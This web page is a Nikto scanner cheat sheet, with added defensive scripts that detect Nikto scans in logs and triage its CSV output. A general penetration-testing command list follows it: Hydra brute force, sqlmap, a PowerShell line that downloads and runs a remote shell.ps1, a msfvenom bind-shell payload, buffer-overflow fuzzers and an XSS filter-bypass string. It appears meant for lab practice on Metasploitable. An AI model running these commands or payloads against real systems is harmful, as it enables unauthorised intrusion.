Nikto Cheat Sheet

  

What is the Nikto

  1. To scan for vulnerabilities, use Nikto: $ nikto -h <webserver>. If port 80 or 443 is open, look for robots.txt to check for hidden flags or clues. To find the web server version, use curl with the -I flag.

perl nikto.pl -h 192.168.1.188 -Cgidirs all -o test -Format csv

The 'all' option instructs Nikto2 to test all available CGI directories. If you want to specify a specific CGI directory, the

To scan a particular host :

nikto -host <host IP/name>

To scan a host on multiple ports (default = 80) :

nikto -host <host IP/name> -port <port1>,<port2>,<port3>

Installation :

$ sudo apt-get install nikto

Standard command to scan websites :

nikto -host <web url/host name> -port <http port number>

Scan options :

nikto -h <hostname/IP address>                 # scan a host
nikto -h <host> -port <port1>,<port2>          # scan host targeting specific ports
nikto -h <hostname> -maxtime <seconds>         # define maximum scan time

Nikto is a free software command-line vulnerability scanner that scans web servers for dangerous files/CGIs, outdated server software and other problems. It performs generic and server type specific checks. It also captures and prints any cookies received. The Nikto code itself is free software, but the data files it uses to drive the program are not.

Features

Nikto can detect over 6700 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files and HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

How to install Nikto in Kali Linux

Now, let’s see how to install this tool on our Kali Linux operating system. In this case I have already installed it, but I will show you how to do it (sudo apt-get install nikto).

In my case it shows nikto is already installed.
Now let’s move on.

Nikto Cheat sheet

All of these attacks are against the Metasploitable 2 vulnerable operating system.

Flags as listed by nikto -H :

Scanning a host :

nikto -h <host>

Scanning specific ports on web server :

nikto -h <host> -port 80,443

Maximum scan time :

nikto -h <host> -maxtime <seconds>

Scanning duration

Disable SSL :

nikto -h <host> -nossl

Force SSL :

nikto -h <host> -ssl

Disable 404 guessing :

nikto -h <host> -no404

Ignore negative responses (302, 301) :

nikto -h <host> -IgnoreCode 301,302

Update the plugins and databases :

nikto -update

Specify host header :

nikto -h <ip> -vhost <hostname>

Output results :

nikto -h <host> -o <file> -Format <csv|htm|txt|xml>

Scanning through a proxy :

nikto -h <host> -useproxy http://<proxy>:<port>

Host authentication :

nikto -h <host> -id <user>:<password>

Database check :

nikto -dbcheck

Config file :

nikto -h <host> -config <file>

Disable name lookups on IP addresses :

nikto -h <host> -nolookup

Disable response cache :

nikto -h <host> -nocache

Disable interactive features :

nikto -h <host> -nointeractive

Display options (-Display) :

1 Show redirects
2 Show Cookies
3 Show 200/OK responses
4 Show URL requiring authentication
D Show debug output
E HTTP Errors
P Print progress to STDOUT
S Scrub output of IP and Hostname
V Verbose output

Evasion Options (-evasion) :

1 Random URI Encoding
2 Directory Self-Reference /./
3 Premature URL ending
4 Prepend long random string
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value (0x0b) as a request spacer
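The evasion options above change how each request is encoded, not how many requests a scan makes or, by default, which User-Agent it sends. On the defending side, a Nikto run therefore still stands out in ordinary web server access logs through the User-Agent string Nikto sends by default and through the burst of 404 responses a file/CGI sweep produces. The script below is an added example written for this page (not part of the original cheat sheet or of Nikto itself): it parses combined-format log lines and flags client IPs on either signal. The log lines are constructed, and the thresholds (5 requests, 60% not-found) are assumptions to tune per site.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format: client IP, identity, user, [timestamp],
# "request line", status, bytes, "referer", "user agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from a real server). 198.51.100.7 runs Nikto with its
# default User-Agent; 192.0.2.44 uses a browser User-Agent but sweeps for files that
# do not exist; 203.0.113.9 is an ordinary visitor. The last line is deliberately
# malformed to show that the parser skips it instead of crashing.
SAMPLE_LOG = """\
203.0.113.9 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:55:37 +0000] "GET /style.css HTTP/1.1" 200 211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000001)"
198.51.100.7 - - [10/Oct/2023:13:55:40 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000002)"
192.0.2.44 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:56:01 +0000] "GET /./phpmyadmin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:56:02 +0000] "GET /backup.zip HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:56:02 +0000] "GET /.git/config HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:56:03 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Oct/2023:13:56:03 +0000] "GET /cgi-bin/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"
this line is not in combined log format and must be skipped rather than crash the parser
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(log_text, min_requests=5, not_found_ratio=0.6):
    """Flag client IPs that look like a Nikto-style file/CGI sweep.

    Two independent signals, so a scan that changes its User-Agent is still caught by
    the second one: (1) Nikto's default User-Agent string, (2) at least `min_requests`
    requests of which a share of `not_found_ratio` or more returned 404.
    Returns {ip: {"requests": n, "not_found": k, "reasons": [...]}} for flagged IPs only.
    """
    per_ip = defaultdict(lambda: {"requests": 0, "not_found": 0, "nikto_ua": False})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip it, never abort the whole analysis
        stats = per_ip[rec["ip"]]
        stats["requests"] += 1
        if rec["status"] == 404:
            stats["not_found"] += 1
        if "nikto" in rec["ua"].lower():
            stats["nikto_ua"] = True

    flagged = {}
    for ip, s in per_ip.items():
        reasons = []
        if s["nikto_ua"]:
            reasons.append("nikto user-agent")
        if s["requests"] >= min_requests and s["not_found"] / s["requests"] >= not_found_ratio:
            reasons.append("high 404 ratio (%d/%d)" % (s["not_found"], s["requests"]))
        if reasons:
            flagged[ip] = {"requests": s["requests"], "not_found": s["not_found"], "reasons": reasons}
    return flagged


if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, info)
```

The 404-ratio signal is the one worth keeping: the URI-level evasions in the list above do not change the fact that most probed paths do not exist on the server, so the ratio survives them while a User-Agent match does not survive a changed -useragent setting.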

Output File Format (-Format) :

csv Comma-separated-value
htm HTML Format
msf+ Log to Metasploit
nbe Nessus NBE
txt Plain text
xml XML Format
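The csv format is the one to pick when scan results have to be triaged or fed into a tracking system rather than read on screen. The script below is an added example written for this page, not part of the original cheat sheet or of Nikto: it parses csv output, summarises findings per host and port, separates findings that carry a reference id from purely informational ones, and collapses the same finding seen on several ports into one record. The column order (host, ip, port, id, method, uri, msg) is an assumption to verify against one real file, and the sample rows are constructed.

```python
import csv
import io
from collections import defaultdict

# Column order assumed here for Nikto's -Format csv output:
# host, ip, port, id (a reference such as an OSVDB number; may be empty), method, uri, message.
# Verify against one real file before wiring this into a pipeline.
COLUMNS = ["host", "ip", "port", "id", "method", "uri", "msg"]

# Constructed sample in that layout; ids and messages are illustrative, not a real scan.
# The last row is deliberately malformed to show that it is dropped, not fatal.
SAMPLE_CSV = '''\
"10.0.0.5","10.0.0.5","80","","GET","/","Server: Apache/2.2.8 (Ubuntu) DAV/2"
"10.0.0.5","10.0.0.5","80","","GET","/","The anti-clickjacking X-Frame-Options header is not present."
"10.0.0.5","10.0.0.5","80","OSVDB-3268","GET","/doc/","Directory indexing found."
"10.0.0.5","10.0.0.5","80","OSVDB-3233","GET","/phpinfo.php","PHP is installed, and a test script which runs phpinfo() was found."
"10.0.0.5","10.0.0.5","443","OSVDB-3268","GET","/doc/","Directory indexing found."
"malformed row with too few columns"
'''


def parse_nikto_csv(text):
    """Parse csv text into a list of finding dicts; rows of the wrong width are dropped."""
    findings = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != len(COLUMNS):
            continue
        findings.append(dict(zip(COLUMNS, row)))
    return findings


def summarize(findings):
    """Per (host, port): total findings, how many carry a reference id, sorted distinct ids."""
    out = defaultdict(lambda: {"total": 0, "with_id": 0, "ids": set()})
    for f in findings:
        key = (f["host"], f["port"])
        out[key]["total"] += 1
        if f["id"]:
            out[key]["with_id"] += 1
            out[key]["ids"].add(f["id"])
    return {k: {"total": v["total"], "with_id": v["with_id"], "ids": sorted(v["ids"])}
            for k, v in out.items()}


def findings_with_id(findings):
    """Findings that carry a reference id map to a known item and are the ones to triage first."""
    return [f for f in findings if f["id"]]


def dedupe(findings):
    """Merge the same (id, uri, msg) seen on several ports of one host into one record."""
    merged = {}
    for f in findings:
        key = (f["host"], f["id"], f["uri"], f["msg"])
        entry = merged.setdefault(key, {"host": f["host"], "id": f["id"], "uri": f["uri"],
                                        "msg": f["msg"], "ports": []})
        if f["port"] not in entry["ports"]:
            entry["ports"].append(f["port"])
    return list(merged.values())


if __name__ == "__main__":
    found = parse_nikto_csv(SAMPLE_CSV)
    for key, stats in summarize(found).items():
        print(key, stats)
    for rec in dedupe(found):
        print(rec["id"] or "info", rec["uri"], rec["ports"])
```

To run it on a real scan, replace SAMPLE_CSV with the contents of the file written by -o <file> -Format csv; the header-style rows with an empty id (server banner, missing headers) stay in the summary counts but drop out of findings_with_id.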

Tuning (-Tuning) :

1 Interesting file
2 Misconfiguration
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval – Inside Web Root
6 Denial of Service
7 Remote File Retrieval – Server Wide
8 Command Execution – Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
x Reverse Tuning Option

Mutate (-mutate) :

1 Test all files in root directory
2 Guess for password file names
3 Enumerate user names via apache
4 Enumerate user names via cgiwrap
5 Attempt to brute force sub-domain names
6 Attempt to guess directory names from a file.

In this tutorial, we learned about Nikto, a vulnerability scanner written in the Perl programming language. First, we learned how to install the tool; then we ran it against our target and explored some of the various options it ships with. Now you know how to use it. Let’s go!

Masscan (local) :

masscan -p1-65534 -rate=10000 -oG name.masscan 10.10.10.10

Netdiscover :

netdiscover -i eth0


Nmap :

nmap -A -p- -T4 -oA nmap/[name].xml 10.10.10.10
nmap --script=vuln -T4 -oA nmap/[name].xml 10.10.10.10
nmap -sC -sV

xsltproc *.xml -o *.html

Nikto :

nikto -host 10.10.10.10[:8080] -output nikto.[name].txt

DirSearch :

/opt/dirsearch/dirsearch.py -u http://10.10.10.10 -e asp,aspx,bat,c,cfm,cgi,com,dll,exe,htm,html,inc,jhtml,jsa,jsp,log,mdb,nsf,php,phtml,pl,reg,sh,shtml,sql,txt,xml,/,js -x 403,400 --json-report=[/path/]dirsearch.json

Gobuster :

/opt/gobuster/gobuster -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.10 -o [name].log -t 25 [-k] [add / option] [-c (cat cookie.txt)]

Dirb :

dirb http://10.10.10.10[:8080] -o dirb.[name].txt

Wfuzz :

wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/megabeast.txt --hc 404,200 http://[ip:port]/FUZZ [ -b 'cookie=value' ] [ -w /usr/share/wordlist ]


Dig :

dig axfr @10.10.10.13 cronos.htb

host :

host -t ns cronos.htb
host -t mx cronos.htb

dnsrecon :

dnsrecon -d cronos.htb -t axfr

Hydra :

ssh :

hydra -L login.txt -P pass.txt [ -c file (user:pass format) ] ssh://10.10.10.10[:port]

http-form-post :

hydra [ip] -s [port] http-form-post "/index.php:password=^PASS^:F=Invalid password!" -P [wordlist] -l '' {in this case no username: -l ''} -t 10 -I


http-form-get :

smb :

hydra -l cristal -x 4:4:a 192.168.2.46 smb

Sqlmap :

sqlmap -r admin.cronos.req --level 5 --risk 3 --threads 10

Hashcat :


PowerShell :

use file from the internet :


IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10:8080/shell.ps1')

Privesc - MetaSploit :

search suggest
post/multi/recon/local_exploit_suggester
set SESSION 1
(powerup ?)

Shell :

magic unicorn

https://www.youtube.com/watch?v=e9lVyFH7-4o

Database

Cookie :

padBuster :

perl padBuster.pl http://10.10.10.10/index.php uBIcLBJyjARxQ7ooer8gpdI4sSUCfulk 8 auth=uBIcLBJyjARxQ7ooer8gpdI4sSUCfulk -plaintext user=admin

Monitoring

Network :

netstat :

watch "netstat -an | grep 4001"

lsof :


watch “lsof -i 4001”

Buffer Overflow

Fuzzing :

#!/usr/bin/env python3
import socket
import time

target_host = "127.0.0.1"
target_port = 4030

# one connection, then repeated sends; the reply to each send is printed
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((target_host, target_port))

for i in range(1, 2000):
    # payload literal as extracted: the backslashes were stripped by the scrape
    # (originally of the form "\x..\n"), so restore it before use
    client.send(b"xn")
    response = client.recv(4096)
    print(response)

Bad Characters :

#!/usr/bin/env python3

# emit every byte value 1..255 so that bytes the target mangles can be spotted in a debugger
shellcode = b""
for i in range(1, 256):
    shellcode += bytes([i])

print(shellcode)

Format String :

Shows 20 dwords from the stack :

for (( i=1; i < 20; i++ )); do echo -n "$i " && ./fs "%$i\$x"; done

Use “%s” to retrieve strings instead :

for (( i=1; i < 20; i++ )); do echo -n "$i " && ./fs "%$i\$s"; done

MSFVenom :

msfvenom -p linux/x86/shell_bind_tcp -b '\x00\x09\x10\x13' LPORT=4450 -f python

Unclassified

JS Prompt :

Filters bypass

<svg%0Ao%00nload=%09((pro\u006dpt))()//

Vim :

record macro : qq

execute macro : @q (register q, as recorded above)

re-execute macro : @@

global substitute : :%s/item1/item2/g